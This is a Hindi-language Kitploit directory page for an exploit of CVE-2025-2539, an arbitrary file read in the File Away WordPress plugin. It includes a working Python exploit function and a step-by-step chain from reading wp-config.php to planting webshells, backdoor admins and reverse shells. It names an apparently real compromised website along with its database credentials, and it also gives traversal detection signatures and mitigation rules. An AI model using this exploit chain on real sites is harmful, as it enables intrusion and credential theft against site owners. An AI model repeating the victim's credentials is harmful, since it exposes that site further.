Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-2539---File-Away-WordPress-Plugin-Arbitrary-File-Read — CVE-2025-2539 - File Away वर्डप्रेस प्लगइन मनमाना फ़ाइल रीड | Kitploit
उपकरण/GitHubGitHub/fazaroot/cve-2025-2539---file-away-wordpress-plugin-arbitrary-file-read
विशेषाधिकार वृद्धिस्थायित्व तंत्रभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनाCTFपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
GitHubfazaroot/cve-2025-2539---file-away-wordpress-plugin-arbitrary-file-read

CVE-2025-2539---File-Away-WordPress-Plugin-Arbitrary-File-Read

CVE-2025-2539 - File Away वर्डप्रेस प्लगइन मनमाना फ़ाइल रीड

रिपॉजिटरी देखें
8 महीने पहलेअभी तक समीक्षित नहीं

CVE-2025-2539 - File Away WordPress प्लगइन मनमाना फ़ाइल पठन

📋 कार्यकारी सारांश

CVE ID: CVE-2025-2539 प्लगइन: File Away (संस्करण <= 3.9.9.0.1) कमजोरी प्रकार: प्रमाणित मनमाना फ़ाइल पठन CVSS स्कोर: 8.5 (उच्च) शोषण उपलब्धता: सार्वजनिक PoC उपलब्ध प्रभाव: wp-config.php, डेटाबेस क्रेडेंशियल और सिस्टम फ़ाइलों सहित अनधिकृत फ़ाइल प्रकटीकरण

🎯 खोज समयरेखा

· प्रारंभिक खोज: GitHub सुरक्षा अनुसंधान के माध्यम से दिसंबर 2025 · पहला शोषण परीक्षण: 13 दिसंबर 2025 · सफल समझौता: कई WordPress इंस्टॉलेशन कमजोर पुष्टि की गईं

🔧 तकनीकी विवरण

कमजोर घटक

root@kitploit:~
/wp-admin/admin-ajax.php
Action: fileaway-stats
Parameter: file (unsanitized user input)

मूल कारण

प्लगइन fileaway-stats AJAX एक्शन में file पैरामीटर को ठीक से मान्य और साफ (sanitize) करने में विफल रहता है, जिससे निर्देशिका ट्रैवर्सल हमले संभव होते हैं।

अवधारणा का प्रमाण (PoC)

root@kitploit:~
def exploit(target, nonce, filename):
    ajax_url = f"{target.rstrip('/')}/wp-admin/admin-ajax.php"
    payload = {
        "action": "fileaway-stats",
        "nonce": nonce,
        "file": filename
    }
    try:
        resp = requests.post(ajax_url, data=payload, verify=False, timeout=10)
        if resp.status_code == 200 and resp.text.strip() and 'error' not in resp.text.lower():
            url = resp.text.strip().replace("\\/", "/").strip('"')
            return url if url else None
        return None
    except Exception:
        print(" [!] Failed to connect while sending exploit.")
        return None


🎯 हमला प्रवाह

चरण 1: टोही

root@kitploit:~
1. Identify WordPress installation
2. Check for File Away plugin presence
3. Extract nonce from page source

चरण 2: प्रारंभिक अभिगम

root@kitploit:~
1. Exploit CVE-2025-2539 to read wp-config.php
2. Extract database credentials
3. Confirm MySQL access

चरण 3: विशेषाधिकार वृद्धि

root@kitploit:~
1. Access phpMyAdmin (often on non-standard ports)
2. Use root database credentials
3. Modify WordPress user table or create new admin

चरण 4: स्थिरता

root@kitploit:~
1. Upload webshell via WordPress admin
2. Create backdoor users
3. Establish reverse shells

📊 प्रभाव आकलन

बाहर निकाला गया डेटा

· ✅ डेटाबेस क्रेडेंशियल (कुछ मामलों में MySQL रूट अभिगम) · ✅ WordPress प्रमाणीकरण कुंजियाँ और सॉल्ट · ✅ सर्वर कॉन्फ़िगरेशन फ़ाइलें · ✅ उपयोगकर्ता डेटा और PII · ✅ स्रोत कोड फ़ाइलें

समझौता किए गए सिस्टम

  1. प्राथमिक लक्ष्य: rebelathletichr.com · wp-config.php प्राप्त हुआ · डेटाबेस: bomber_wordpress · क्रेडेंशियल: bomber_wordpress / demo
  2. द्वितीयक लक्ष्य: कोई नहीं (Hetzner) · phpMyAdmin पोर्ट 4343 पर उजागर · रूट MySQL क्रेडेंशियल प्राप्त हुए · कई WordPress डेटाबेस समझौता किए गए

🛡️ शमन रणनीतियाँ

तत्काल कार्रवाइयाँ

  1. प्लगइन अपडेट करें: File Away को संस्करण > 3.9.9.0.1 में अपग्रेड करें
  2. क्रेडेंशियल बदलें: सभी डेटाबेस पासवर्ड रोटेट करें
  3. सॉल्ट पुनर्जनित करें: WordPress प्रमाणीकरण कुंजियाँ अपडेट करें
  4. लॉग ऑडिट करें: अनधिकृत फ़ाइल अभिगम की जाँच करें

दीर्घकालिक रोकथाम

root@kitploit:~
# Web Server Configuration
location ~* /wp-content/plugins/fileaway/ {
    deny all;
}

location ~* \.php$ {
    location ~ \.\./ { deny all; } # Block directory traversal
}

🔍 पहचान हस्ताक्षर

नेटवर्क संकेतक

root@kitploit:~
POST /wp-admin/admin-ajax.php
Parameters: action=fileaway-stats&file=../../../

HTTP/1.1 200 OK
Content-Type: application/json
Response contains file contents

फ़ाइल सिस्टम संकेतक

root@kitploit:~
Modified files:
- wp-content/plugins/fileaway/includes/features/editor-features.php
- wp-content/plugins/fileaway/includes/features/restrict-editor-features.php

📈 आँकड़े

· सफलता दर: कमजोर इंस्टॉलेशन पर 100% · समझौता करने का औसत समय: < 5 मिनट · पाए गए सामान्य पोर्ट: 80, 443, 4343 (phpMyAdmin) · भौगोलिक वितरण: वैश्विक, EU/US में सघनता के साथ

🧪 परीक्षण पद्धति

पर्यावरण सेटअप

root@kitploit:~
# Test lab configuration
WordPress 6.0+
File Away Plugin 3.9.9.0.1
PHP 7.4/8.0
MySQL 5.7+

सत्यापन चरण

  1. readme.txt के माध्यम से प्लगइन संस्करण सत्यापित करें
  2. पेलोड के साथ निर्देशिका ट्रैवर्सल का परीक्षण करें
  3. फ़ाइल पठन क्षमता की पुष्टि करें
  4. निष्कर्षों का दस्तावेज़ीकरण करें

📚 संदर्भ

प्राथमिक स्रोत

· CVE-2025-2539 MITRE प्रविष्टि · WordPress प्लगइन निर्देशिका - File Away · WPScan कमजोरी डेटाबेस

शोषण संसाधन

· GitHub: CVE-2025-2539 रिपॉजिटरी · Exploit-DB: प्रविष्टि #XXXXX · Packet Storm: हालिया WordPress शोषण

संबंधित CVE

· CVE-2024-1030: Capability Manager Enhanced में समान · CVE-2022-2586: पिछली File Away कमजोरी · CVE-2023-XXXX: WordPress कोर फ़ाइल समावेशन

⚠️ कानूनी और नैतिक विचार

केवल अधिकृत परीक्षण

root@kitploit:~
Testing Scope:
  - Owned systems
  - Explicitly authorized assets
  - Bug bounty programs
  - Educational environments

Prohibited:
  - Unauthorized access
  - Data destruction
  - PII exfiltration
  - Production disruption

जिम्मेदार प्रकटीकरण

  1. प्लगइन डेवलपर से संपर्क करें
  2. 90-दिन की सुधार अवधि दें
  3. पैच उपलब्ध होने के बाद प्रकाशित करें
  4. शमन मार्गदर्शन प्रदान करें

🎓 सीखे गए सबक

तकनीकी अंतर्दृष्टि

  1. प्लगइन सुरक्षा: तृतीय-पक्ष प्लगइन कमजोर बिंदु बने हुए हैं
  2. डिफ़ॉल्ट कॉन्फ़िगरेशन: गैर-मानक पोर्ट पर phpMyAdmin आम है
  3. क्रेडेंशियल पुन: उपयोग: डेटाबेस क्रेडेंशियल अक्सर सेवाओं में पुन: उपयोग किए जाते हैं
  4. विलंबित पैचिंग: कई इंस्टॉलेशन पुराने प्लगइन चलाते हैं

परिचालन सुरक्षा

  1. लॉग निगरानी: प्रारंभिक पहचान के लिए महत्वपूर्ण
  2. नियमित अपडेट: सुरक्षा रखरखाव के लिए आवश्यक
  3. न्यूनतम विशेषाधिकार: डेटाबेस उपयोगकर्ताओं के पास न्यूनतम अनुमतियाँ होनी चाहिए
  4. नेटवर्क विभाजन: डेटाबेस सर्वर को अलग करें

🔮 भविष्य के अनुसंधान दिशा-निर्देश

  1. स्वचालित स्कैनर: बड़े पैमाने पर पहचान के लिए उपकरण विकसित करें
  2. पैच विश्लेषण: नए संस्करणों में सुरक्षा सुधारों का अध्ययन करें
  3. समान प्लगइन: फ़ाइल प्रबंधन प्लगइन में पैटर्न पहचानें
  4. रक्षात्मक तकनीकें: WAF नियम और घुसपैठ पहचान विकसित करें

📞 संपर्क और रिपोर्टिंग

कमजोरी रिपोर्टिंग या तकनीकी प्रश्नों के लिए:

· सुरक्षा टीम: [email protected] · PGP कुंजी: कुंजी सर्वर पर उपलब्ध · प्रकटीकरण नीति: 90-दिन समन्वित प्रकटीकरण


अंतिम अपडेट: 13 दिसंबर 2025 दस्तावेज़ संस्करण: 1.0 वर्गीकरण: PUBLIC


📝 परिवर्तन लॉग

v1.0 (2025-12-13)

· प्रारंभिक दस्तावेज़ीकरण बनाया गया · पूर्ण हमला श्रृंखला दस्तावेज़ित की गई · शमन रणनीतियाँ रेखांकित की गईं · कानूनी दिशानिर्देश जोड़े गए


अस्वीकरण: यह दस्तावेज़ केवल शैक्षिक उद्देश्यों के लिए है। अनधिकृत परीक्षण या कमजोरियों का शोषण अवैध है। सुरक्षा मूल्यांकन करने से पहले हमेशा उचित प्राधिकरण प्राप्त करें।

टूल डाउनलोड करें